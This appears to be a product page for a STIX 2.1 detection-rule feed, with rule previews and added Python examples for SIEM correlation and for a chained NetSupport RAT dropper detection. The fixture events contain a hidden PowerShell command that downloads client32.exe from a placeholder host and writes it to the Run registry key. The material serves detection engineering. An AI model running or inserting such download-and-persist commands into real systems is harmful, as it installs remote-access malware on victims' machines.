Description:
A full collection of new detection rules and rule modifications. Rules are pre-processed and shipped with their extracted key observables (IPs, hashes, domains, file names, registry keys, etc.) so they can be used directly in SIEM/TIP platforms and for CTI correlation. The feed is designed for SOC teams and detection engineers who need reliable, actionable data. Including rule updates also helps teams maintain and refine their own detection logic by observing community best practices.
Contents:
- Identity: 39
- Indicator: 7996
- Directory: 3608
- Domain-Name: 1075
- Email-Addr: 28
- File: 4567
- Ipv4-Addr: 54
- Ipv6-Addr: 12
- Process: 6557
- Relationship: 26421
- Windows-Registry-Key: 844
Application:
- Informed detection engineering - reduces the significant manual effort of discovering, collecting, parsing, normalizing and extracting value from public rule repositories.
- Direct SIEM/TIP/SOAR integration - the structured STIX 2.1 format with explicit observable objects allows straightforward ingestion into your existing security platforms.
- Improved threat hunting - use the detection logic and the extracted observables for proactive threat hunting.
- Improved coverage and performance - information about new rules and the details of rule modifications helps your team maintain and tune its existing rules more easily.
- CTI correlation - match observables against your other threat intelligence feeds, internal logs and CTI databases to uncover related activity and inform detection prioritization.
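The ingestion and correlation path these bullets describe, as an added Python example written for this page (it is not the feed's own tooling and not code from any of the rule sources the feed aggregates): it walks a STIX 2.1 bundle, pulls the matchable value out of each cyber-observable type listed under Contents, attaches the name of the indicator each observable is linked to through relationship objects, and matches the resulting rows against a few log lines. The bundle, its IDs, the domain updates.example.invalid, the hash, the command line and the log lines are all constructed placeholders; linking the indicator to its observables with 'related-to' relationships is an assumption, real bundles may use other relationship types or observed-data objects.

```python
# Added example, not feed data.  IDs, domain, hash, command line and log lines
# are constructed placeholders; the 'related-to' links are an assumption.
IND = "indicator--11111111-1111-4111-8111-111111111111"
DOM = "domain-name--22222222-2222-5222-8222-222222222222"
FIL = "file--33333333-3333-5333-8333-333333333333"
PRC = "process--44444444-4444-4444-8444-444444444444"
REG = "windows-registry-key--55555555-5555-5555-8555-555555555555"

SAMPLE_BUNDLE = {
    "type": "bundle", "id": "bundle--00000000-0000-4000-8000-000000000000",
    "objects": [
        {"type": "indicator", "id": IND, "name": "Example BAT dropper rule",
         "pattern_type": "stix",
         "pattern": "[domain-name:value = 'updates.example.invalid']",
         "valid_from": "2024-01-01T00:00:00Z"},
        {"type": "domain-name", "id": DOM, "value": "updates.example.invalid"},
        {"type": "file", "id": FIL, "name": "client32.exe",
         "hashes": {"SHA-256": "0123456789abcdef" * 4}},
        {"type": "process", "id": PRC,
         "command_line": "powershell.exe -WindowStyle Hidden -Command "
                         "Invoke-WebRequest http://updates.example.invalid/c32"},
        {"type": "windows-registry-key", "id": REG,
         "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"},
        {"type": "relationship", "id": "relationship--66666666-6666-4666-8666-666666666666",
         "relationship_type": "related-to", "source_ref": IND, "target_ref": DOM},
        {"type": "relationship", "id": "relationship--77777777-7777-4777-8777-777777777777",
         "relationship_type": "related-to", "source_ref": IND, "target_ref": FIL},
        {"type": "relationship", "id": "relationship--88888888-8888-4888-8888-888888888888",
         "relationship_type": "related-to", "source_ref": IND, "target_ref": REG},
    ],
}

# Constructed log lines in DNS, proxy and registry-audit style.
SAMPLE_LOGS = [
    "2024-05-01T10:00:01Z dns client=10.0.0.5 query=updates.example.invalid type=A",
    "2024-05-01T10:00:02Z proxy client=10.0.0.5 url=https://updates.example.invalid/client32.exe status=200",
    "2024-05-01T10:00:03Z registry host=WS01 op=SetValue "
    "key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run data=C:\\Users\\Public\\client32.exe",
    "2024-05-01T10:00:04Z dns client=10.0.0.9 query=www.example.com type=A",
]

# Property of each STIX cyber-observable type that carries a matchable value.
OBSERVABLE_FIELDS = {
    "domain-name": ("value",), "ipv4-addr": ("value",), "ipv6-addr": ("value",),
    "email-addr": ("value",), "directory": ("path",), "file": ("name", "hashes"),
    "process": ("command_line",), "windows-registry-key": ("key",),
}

REG_HIVE_ALIASES = {"hkcu\\": "hkey_current_user\\", "hklm\\": "hkey_local_machine\\"}


def normalize(text):
    """Lower-case and expand short hive names so HKCU\\... equals HKEY_CURRENT_USER\\..."""
    text = text.lower()
    for short, full in REG_HIVE_ALIASES.items():
        text = text.replace(short, full)
    return text


def indicator_context(bundle):
    """Map each observable id to the names of the indicators it is related to."""
    names = {o["id"]: o.get("name", o["id"]) for o in bundle["objects"] if o["type"] == "indicator"}
    ctx = {}
    for o in bundle["objects"]:
        if o["type"] != "relationship":
            continue
        src, dst = o["source_ref"], o["target_ref"]
        if src in names:
            ctx.setdefault(dst, []).append(names[src])
        elif dst in names:
            ctx.setdefault(src, []).append(names[dst])
    return ctx


def siem_lookup_rows(bundle):
    """Flatten the bundle to (type, value, indicator-name) rows, the shape a SIEM
    lookup table or TIP import expects.  Observables without a linked indicator
    are kept but tagged 'unlinked' so analysts can see they lack context."""
    ctx = indicator_context(bundle)
    rows = []
    for o in bundle["objects"]:
        for field in OBSERVABLE_FIELDS.get(o["type"], ()):
            v = o.get(field)
            values = list(v.values()) if isinstance(v, dict) else ([v] if v else [])
            for value in values:
                rows.append((o["type"], value, ";".join(ctx.get(o["id"], ["unlinked"]))))
    return rows


def correlate(rows, log_lines):
    """Substring-match every observable value against every log line after
    normalisation.  Returns one (line_no, type, value, indicator) tuple per hit."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        norm_line = normalize(line)
        for typ, value, ind in rows:
            if normalize(value) in norm_line:
                hits.append((n, typ, value, ind))
    return hits


if __name__ == "__main__":
    for hit in correlate(siem_lookup_rows(SAMPLE_BUNDLE), SAMPLE_LOGS):
        print(hit)
```

Full-string matching of a process command line, as done here, only fires on an exact repeat; in practice the command-line and registry-key observables are better turned into the tokenised detection logic the rule itself carries, while domains, IPs, hashes and file names are the rows worth loading as plain lookup values.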
STIX/TAXII endpoints:
Content preview:

Latest 10 entities:
- ANY.RUN Obfuscated BAT Dropper Delivers NetSupport RAT post (Kql, new rule)
  This KQL query detects the execution of an obfuscated BAT dropper that delivers the NetSupport RAT. It identifies instances where cmd.exe launches a .bat file, which in turn executes PowerShell with a hidden window style and Invoke-WebRequest, followed by a registry modification that adds client32.exe to the Run key.
  MITRE ATT&CK tactics: TA0005, TA0003. Techniques: T1059.003, T1566.001, T1547.001. Labels: malicious-activity, TA0005, TA0003, T1059.003, T1566.001, T1547.001
- Open Redirect: bananaguide.com (Sublime-Security, new rule)
  This rule detects the use of the bananaguide.com redirect with a URL parameter in messages, which has been exploited in the wild. It checks inbound messages for links where the domain is bananaguide.com, the path is /thru.php, and the URL parameter is present and does not redirect back to bananaguide.com. Trusted sender domains are excluded unless they fail DMARC authentication, and messages from bananaguide.com itself are excluded.
  MITRE ATT&CK tactics: TA0001, TA0009. Techniques: T1598, T1189, T1204, T1566. Labels: credential-access, malicious-activity, TA0001, TA0009, T1598, T1189, T1204, T1566
- Credential phishing: Email delivery failure impersonation (Sublime-Security, new rule)
  This rule detects phishing emails that impersonate email system notifications about delivery failures or other email system issues. It identifies emails that ask users to take action to 'fix' or 'recover' their email functionality, which typically leads to a credential harvesting portal. The rule analyses email content, sender information and links to identify potential phishing attempts.
  MITRE ATT&CK tactics: TA0001, TA0006. Techniques: T1566, T1566.002, T1598, T1598.007. Labels: credential-access, phishing, TA0001, TA0006, T1566, T1566.002, T1598, T1598.007
The remaining seven entries are shown in the preview only by their STIX identifiers:
- file--0c1f67c1-3818-5514-b383-c56c23bb50aa
- process--c4988bad-df6a-4661-9a3b-a272f1efb204
- windows-registry-key--6879fcd9-ca48-558a-90a0-ce718860f913
- domain-name--a55309c3-ab50-531c-a66c-adf04038bdb9
- domain-name--2d8f3d77-dc85-5b86-90c1-bc48e6f8eb2d
- relationship--71350844-f54c-4dda-9efc-14ff4203e0a2
- relationship--07f3ab79-2d1b-4560-8b41-b758bd59b2c7
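The first rule description above gives enough of the logic to show how such a chained detection is evaluated. The following Python is an added illustration written for this page; it is not the rule from the Kql source and not a translation of its KQL. It runs the three stages the description names (cmd.exe launching a .bat file, a child powershell.exe with a hidden window and Invoke-WebRequest, then a Run-key write referencing client32.exe on the same host within a time window) over constructed process-creation and registry-write events. The event schema, hostnames, PIDs, timestamps, the domain and the 300-second window are assumptions. It goes slightly beyond the description by also accepting PowerShell's parameter and cmdlet abbreviations (-w hidden, iwr), which a practitioner would want covered because droppers routinely use them.

```python
# Added example: the three-stage BAT-dropper chain, evaluated over constructed
# events.  Event schema, hosts, PIDs, timestamps (epoch seconds), the domain
# and the time window are assumptions, not data from the feed.
EVENTS = [
    # WS01: the full chain the rule describes (constructed).
    {"type": "process", "ts": 1000, "host": "WS01", "pid": 4120, "ppid": 3001,
     "image": "cmd.exe", "cmdline": 'cmd.exe /c "C:\\Users\\alice\\Downloads\\Invoice.bat"'},
    {"type": "process", "ts": 1002, "host": "WS01", "pid": 4133, "ppid": 4120,
     "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr http://updates.example.invalid/c32 '
                '-OutFile C:\\Users\\Public\\client32.exe"'},
    {"type": "registry", "ts": 1010, "host": "WS01", "pid": 4133,
     "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value": "client32", "data": "C:\\Users\\Public\\client32.exe"},
    # WS02: admin .bat that runs PowerShell in a visible window, no download.
    {"type": "process", "ts": 2000, "host": "WS02", "pid": 5100, "ppid": 2222,
     "image": "cmd.exe", "cmdline": "cmd.exe /c C:\\Scripts\\backup.bat"},
    {"type": "process", "ts": 2001, "host": "WS02", "pid": 5105, "ppid": 5100,
     "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    # WS03: hidden download from a .bat but no Run-key persistence.
    {"type": "process", "ts": 3000, "host": "WS03", "pid": 6100, "ppid": 1111,
     "image": "cmd.exe", "cmdline": "cmd.exe /c C:\\Temp\\update.bat"},
    {"type": "process", "ts": 3001, "host": "WS03", "pid": 6104, "ppid": 6100,
     "image": "powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -Command Invoke-WebRequest "
                "http://intranet.example.invalid/tool.zip -OutFile C:\\Temp\\tool.zip"},
]


def has_hidden_window(cmdline):
    """True if the command line sets WindowStyle to Hidden.  PowerShell accepts
    any unambiguous prefix of a parameter name or enum value, so '-w hidden',
    '-win hid' and '-WindowStyle Hidden' all count."""
    toks = cmdline.lower().split()
    for param, val in zip(toks, toks[1:]):
        if param.startswith("-w") and "-windowstyle".startswith(param) and "hidden".startswith(val):
            return True
    return False


def has_web_fetch(cmdline):
    """True if Invoke-WebRequest or its built-in alias iwr appears as a token."""
    return any(tok.strip("\"'(){};") in ("invoke-webrequest", "iwr")
               for tok in cmdline.lower().split())


def detect_bat_dropper(events, window=300):
    """Return one alert per cmd.exe -> .bat -> hidden PowerShell download ->
    Run-key write chain.  Stages 1 and 2 are tied by parent PID; stage 3 is
    tied by host and a time window, because registry telemetry does not always
    carry a PID that matches the writing process."""
    procs = [e for e in events if e["type"] == "process"]
    regs = [e for e in events if e["type"] == "registry"]
    alerts = []
    for bat in procs:
        if bat["image"].lower() != "cmd.exe" or ".bat" not in bat["cmdline"].lower():
            continue
        for ps in procs:
            if (ps["host"] != bat["host"] or ps["ppid"] != bat["pid"]
                    or ps["image"].lower() != "powershell.exe"
                    or not (has_hidden_window(ps["cmdline"]) and has_web_fetch(ps["cmdline"]))):
                continue
            for reg in regs:
                if (reg["host"] == ps["host"] and 0 <= reg["ts"] - ps["ts"] <= window
                        and reg["key"].lower().endswith("\\currentversion\\run")
                        and "client32.exe" in reg["data"].lower()):
                    alerts.append({"host": bat["host"], "bat_pid": bat["pid"],
                                   "ps_pid": ps["pid"], "run_data": reg["data"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bat_dropper(EVENTS):
        print(alert)
```

Only the WS01 chain fires: WS02 has no hidden window or download, and WS03 downloads but never persists. The last stage keys on the literal name client32.exe because that is what the description specifies; a renamed payload would slip past it, so a broader Run-key persistence rule should sit alongside this one rather than be replaced by it.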